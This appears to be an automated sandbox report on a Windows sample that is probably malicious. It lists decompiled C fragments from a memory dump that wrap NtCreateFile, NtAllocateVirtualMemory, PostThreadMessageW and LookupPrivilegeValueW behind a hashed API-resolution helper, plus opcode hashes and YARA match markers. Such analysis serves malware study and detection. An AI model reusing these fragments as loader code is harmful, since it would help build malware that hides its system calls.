			E00419F2B(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t32;

				asm("adc al, 0x70");
				asm("rcl byte [ebp-0x75], 0xec");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041AB30(_t32, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419f2d
0x00419f2f
0x00419f33
0x00419f3f
0x00419f47
0x00419f7d
0x00419f81

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e30260934743d6ac78195a2066a90e55a201733bccfca0bc3d230e36f279d955
Instruction ID: 5c355d1e1ff7a100a890f215dab3bd0dbeffb13d21947025a9a788d8be15f040
Opcode Fuzzy Hash: e30260934743d6ac78195a2066a90e55a201733bccfca0bc3d230e36f279d955
Instruction Fuzzy Hash: 1601B2B2205108AFDB18CF98DC95EEB77A9AF8C354F158248FA1D97281C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F30(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419f3f
0x00419f47
0x00419f7d
0x00419f81

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a11f
0x0041a127
0x0041a149
0x0041a14d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A060(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a063
0x0041a066
0x0041a06f
0x0041a077
0x0041a085
0x0041a089

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A798FA

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 54686a06963b3ed923b6099390312043f2027da41e3d075cdd7da1182a2b2c1b
Instruction ID: 95dc5a4f00be70395992eccfe39e4652c6a71f07d15bd73591281d544100d12b
Opcode Fuzzy Hash: 54686a06963b3ed923b6099390312043f2027da41e3d075cdd7da1182a2b2c1b
Instruction Fuzzy Hash: C79002A160100502D20171698404A16010A97D0381F91C032E1014559ECA658992F271

Uniqueness

Uniqueness Score: -1.00%

Function 00A79860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A7986A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 476a48b510438bfd63ac64979ce8a793f90ae4a8a7d542cb69ea2ae329c8904a
Instruction ID: 37a89b20ea141a0c27010c5c880206af32848d46f17dcd4e54105b3c6a6fbc39
Opcode Fuzzy Hash: 476a48b510438bfd63ac64979ce8a793f90ae4a8a7d542cb69ea2ae329c8904a
Instruction Fuzzy Hash: 599002B120100413D21171698504B07010997D0381F91C422E041455CD96968952F261

Uniqueness

Uniqueness Score: -1.00%

Function 00A79840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A7984A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6fb7e45e01e1b490583c7579d472ca3d473ed4429eb942ffcce0fed6077af49
Instruction ID: 055ba306e5d8687e6a7cc7efd94b33a903b489f403f14935f7204590d31dae8b
Opcode Fuzzy Hash: c6fb7e45e01e1b490583c7579d472ca3d473ed4429eb942ffcce0fed6077af49
Instruction Fuzzy Hash: 809002A1242041525645B16984049074106A7E0381791C022E1404954C85669856E761

Uniqueness

Uniqueness Score: -1.00%

Function 00A799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A799AA

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb0aa4bc4990cc4b708439c271f97c9e5817993a1dbcfc7e7c738dd8295814d2
Instruction ID: 541e0141667a0ef71bfdacd7b718fd17e4e0945e43b6398ae52cb35ed4c33734
Opcode Fuzzy Hash: fb0aa4bc4990cc4b708439c271f97c9e5817993a1dbcfc7e7c738dd8295814d2
Instruction Fuzzy Hash: 829002E134100442D20071698414F060105D7E1341F51C025E1054558D8659CC52B266

Uniqueness

Uniqueness Score: -1.00%

Function 00A795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A795DA

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fac19dcfa385b03d26cd36bed8ab1330bcf19abdf0485879fa74cbace07368f
Instruction ID: 653ea5a42b88b4d07d71e9b3b7136dc11e9ff538c3011b39b80cf1f5c0a99805
Opcode Fuzzy Hash: 3fac19dcfa385b03d26cd36bed8ab1330bcf19abdf0485879fa74cbace07368f
Instruction Fuzzy Hash: 469002E120200003420571698414A16410A97E0341B51C031E1004594DC5658891B265

Uniqueness

Uniqueness Score: -1.00%

Function 00A79910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A7991A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe767c9f007ad805615c23381beca101ca1995fe5f31213bc69fcec98127100d
Instruction ID: c224218b70cd6aa9bccc6d0aec5831681f300a54dca9a029f800c72a5837fd98
Opcode Fuzzy Hash: fe767c9f007ad805615c23381beca101ca1995fe5f31213bc69fcec98127100d
Instruction Fuzzy Hash: E89002F120100402D24071698404B46010597D0341F51C021E5054558E86998DD5B7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A79540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A7954A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6c8bf4500547b9ddeb1a0d41f8d268a3654e5f81d515b500bcd72dc1a3dbe88
Instruction ID: a8c635c6f3ce2a59bde2d119ee1d4f32bb2c9071602911e830255e7a426b4c59
Opcode Fuzzy Hash: f6c8bf4500547b9ddeb1a0d41f8d268a3654e5f81d515b500bcd72dc1a3dbe88
Instruction Fuzzy Hash: 5D9002A5211000030205B5694704907014697D5391351C031F1005554CD6618861A261

Uniqueness

Uniqueness Score: -1.00%

Function 00A796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A796EA

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa2f5e698e1754b53130347cd5a8e54930027e36c9d6c38c6e01fc3488d97ebc
Instruction ID: da26fb0e6af0e872c43af34e1ab5a19018abf162597a96ec9b5e95cc6282fbf0
Opcode Fuzzy Hash: aa2f5e698e1754b53130347cd5a8e54930027e36c9d6c38c6e01fc3488d97ebc
Instruction Fuzzy Hash: 719002B120108802D2107169C404B4A010597D0341F55C421E441465CD86D58891B261

Uniqueness

Uniqueness Score: -1.00%

Function 00A79A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A79A2A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e85e58356adf1d205258b348aa4e9ec7f2574d617287b36df07c4d08d7c86c4
Instruction ID: f589b4a70988fd04bf188e27a2920310d03fed33d2046cd70307de9334a44694
Opcode Fuzzy Hash: 9e85e58356adf1d205258b348aa4e9ec7f2574d617287b36df07c4d08d7c86c4
Instruction Fuzzy Hash: 8D9002A16010004242407179C844D064105BBE1351751C131E0988554D85998865A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A79A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A79A0A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 691578c3ebcf780fd2c42a65af3b3260f14c7bd2c2e29ba55641b708987a7bac
Instruction ID: ffb977d126ae76b2b5b0d855dc5d47928a7f727c9f32107165f463eb983b1892
Opcode Fuzzy Hash: 691578c3ebcf780fd2c42a65af3b3260f14c7bd2c2e29ba55641b708987a7bac
Instruction Fuzzy Hash: 329002B120140402D20071698814B0B010597D0342F51C021E1154559D86658851B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A79660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A7966A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b398496b5c74fcdd3c7bf2cb04be077830960edf56a203c157f4fbf6acb6d2d
Instruction ID: 67efbf95e403bce0eab34213e44ae20a0f822569cf77f43ab9451f59f78444f1
Opcode Fuzzy Hash: 1b398496b5c74fcdd3c7bf2cb04be077830960edf56a203c157f4fbf6acb6d2d
Instruction Fuzzy Hash: 4F9002B120100802D28071698404A4A010597D1341F91C025E0015658DCA558A59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A79A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A79A5A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b49b74723f54cb08f3443e9d9e9146a9a759a7fcf733fee52760c844720ad684
Instruction ID: 2ab6526ae62598a7873b913d79bb8e68efc14e4bfa628556cddb84f779216e01
Opcode Fuzzy Hash: b49b74723f54cb08f3443e9d9e9146a9a759a7fcf733fee52760c844720ad684
Instruction Fuzzy Hash: C09002A121180042D30075798C14F07010597D0343F51C125E0144558CC9558861A661

Uniqueness

Uniqueness Score: -1.00%

Function 00A797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A797AA

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b809100d4ea6c2828cc341c1865e31250f3cb2c6bf41ac92f2bce11772d8dca
Instruction ID: 374dc3021f8a7a37be6b1a996a80ba011ceab225a033106dfb28e33bdb7a630e
Opcode Fuzzy Hash: 6b809100d4ea6c2828cc341c1865e31250f3cb2c6bf41ac92f2bce11772d8dca
Instruction Fuzzy Hash: 179002A130100003D24071699418A064105E7E1341F51D021E0404558CD9558856A362

Uniqueness

Uniqueness Score: -1.00%

Function 00A79780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A7978A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f26cc302352d3d4e2a2ea132ea4422feefdc1fce7954837ad85c850f839ef7c
Instruction ID: e8da9886841600fadab7c19d13be245a011f6bc60253b82172b9e4c7b4694863
Opcode Fuzzy Hash: 1f26cc302352d3d4e2a2ea132ea4422feefdc1fce7954837ad85c850f839ef7c
Instruction Fuzzy Hash: 529002A921300002D28071699408A0A010597D1342F91D425E000555CCC9558869A361

Uniqueness

Uniqueness Score: -1.00%

Function 00A79710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A7971A

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2759cf177443e3f801c692dbf7f3ec067cc241755cd84a81edc3a753db71f9b0
Instruction ID: 6483de00d23bd4c99ef5b503e74ebd35f0325bd89cef6fef0f2237104f890fd9
Opcode Fuzzy Hash: 2759cf177443e3f801c692dbf7f3ec067cc241755cd84a81edc3a753db71f9b0
Instruction Fuzzy Hash: C29002B120100402D20075A99408A46010597E0341F51D021E5014559EC6A58891B271

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004082E8(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				void* _t16;
				long _t23;
				int _t28;
				void* _t31;
				void* _t33;
				void* _t38;

				asm("lds ebx, [edx-0x74aab08d]");
				_t31 = _t33;
				_v68 = 0;
				E0041BA30( &_v67, 0, 0x3f);
				E0041C5D0( &_v68, 3);
				_t12 = E0040ACD0(_t16, _t38, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t28 = _t13;
				if(_t28 != 0) {
					_t23 = _a8;
					_t13 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t40 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t28(_t23, 0x8003, _t31 + (E0040A460(_t40, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}

0x004082ec
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 55122ea40b96d3cc14daaba59eb336be709253dcc16157ed3570bb0356da82b7
Instruction ID: afa480a252ec9a2f85d4327427056370565cd436267a3936a1b3a545fd6740e5
Opcode Fuzzy Hash: 55122ea40b96d3cc14daaba59eb336be709253dcc16157ed3570bb0356da82b7
Instruction Fuzzy Hash: 7C01F531A803287BE720AAA48C43FFE772CAB40B54F04411DFB04BA1C1D6A9690542E9

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041BA30( &_v67, 0, 0x3f);
				E0041C5D0( &_v68, 3);
				_t12 = E0040ACD0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A460(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A391, Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041A391(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _v117;
				int _t16;
				void* _t29;

				 *__eax = __ecx;
				asm("movsb");
				asm("out 0x17, eax");
				asm("int3");
				asm("adc al, 0x1a");
				_v117 = __edx - 1;
				_t13 = _a4;
				E0041AB30(_t29, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t13 + 0xa18)), 0, 0x46);
				_t16 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t16;
			}

0x0041a393
0x0041a396
0x0041a397
0x0041a399
0x0041a39d
0x0041a39f
0x0041a3a3
0x0041a3ba
0x0041a3d0
0x0041a3d4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 38cd8b586b5dd512b37dfb32bcccfaf2b518bfddbbdfd36e0ee0de862b757f52
Instruction ID: 527fd2326c1f7d456c1d7f9755af21f92bfc759708f7c794dd2578ec55dad73c
Opcode Fuzzy Hash: 38cd8b586b5dd512b37dfb32bcccfaf2b518bfddbbdfd36e0ee0de862b757f52
Instruction Fuzzy Hash: 9CF027712002046FCB10DF58C880EDB3798DF88250F044168FA49AB202D530A801CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A240, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A240(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a24f
0x0041a257
0x0041a26d
0x0041a271

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A200, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A200(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a217
0x0041a22d
0x0041a231

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A3A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a3ba
0x0041a3d0
0x0041a3d4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A280, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A280(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a283
0x0041a29a
0x0041a2a8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
